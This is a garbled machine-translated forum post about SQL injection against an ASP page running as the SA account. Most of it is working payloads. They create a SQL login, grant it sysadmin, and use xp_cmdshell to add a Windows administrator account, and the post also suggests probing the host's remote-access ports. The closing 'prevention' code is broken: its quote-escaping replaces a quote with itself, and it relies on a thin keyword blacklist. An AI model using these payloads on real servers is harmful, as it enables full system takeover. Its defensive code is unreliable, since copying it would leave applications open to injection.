Many people use the SA when published by the database, plus "select .. where name =" Request.QueryString ["name"], let's take a look at the results ?!
[问题 problem, specific ordered itself "
Turn the value of Request.QueryString ["name"] to: 1.; Exec master.dbo.sp_addlogin test, test, master --- // Establish user 2.; exec master.dbo.sp_addsrvrolemember 'test', 'sysadmin' - // Provide user TEST to the administrator group
Use Telnet WWW. ***. COM 1433 to see if you can log in remote, if you can 嘿嘿 ..
No. Can't you?
The people who have programmed above are not high, see his machines have those ports to drive Telnet WWW. ***. Com 1433telnet www. ***. Com 3389telnet www. ***. Com 21TELNET WWW. ** * .com 139telnet www. ***. COM 445 Most of them, let's suppose all open! Run the following stored procedure in his SQL query analyzer, one runtime run exec master.dbo.xp_cmdshell ' Net user test test / workStations: * / Times: ALL / Passwordchg: Yes / PasswordReq: Yes / Active: Yes / Add'Exec Master.dbo.xp_cmdshell 'Net localgroup administrators test / add'
This way you have established a system account in his system, and the SQL account is established.
I wonder what I want to do, I will not say, I will ask me to prevent attack: Method 1 - Filter single quotes Function Escape (Input) INPUT = Replace (INPUT, "'", "'") escape = INPUTEND FUNCTION
Method 2 - Rejecting known error Input function validate_string (input) known_bad = array ("SELECT", "INSERT", "Update", "delete", "DROP", "-", "') Validate_String = true For i = lbound (known_bad) to Ubound (KNown_Bad) IF (INSTR (1, Input, KNown_Bad (i), vbtextcompare) <> 0) Then Validate_String = False EXIT FUNCTION END IF NEXTEND FUNCTION
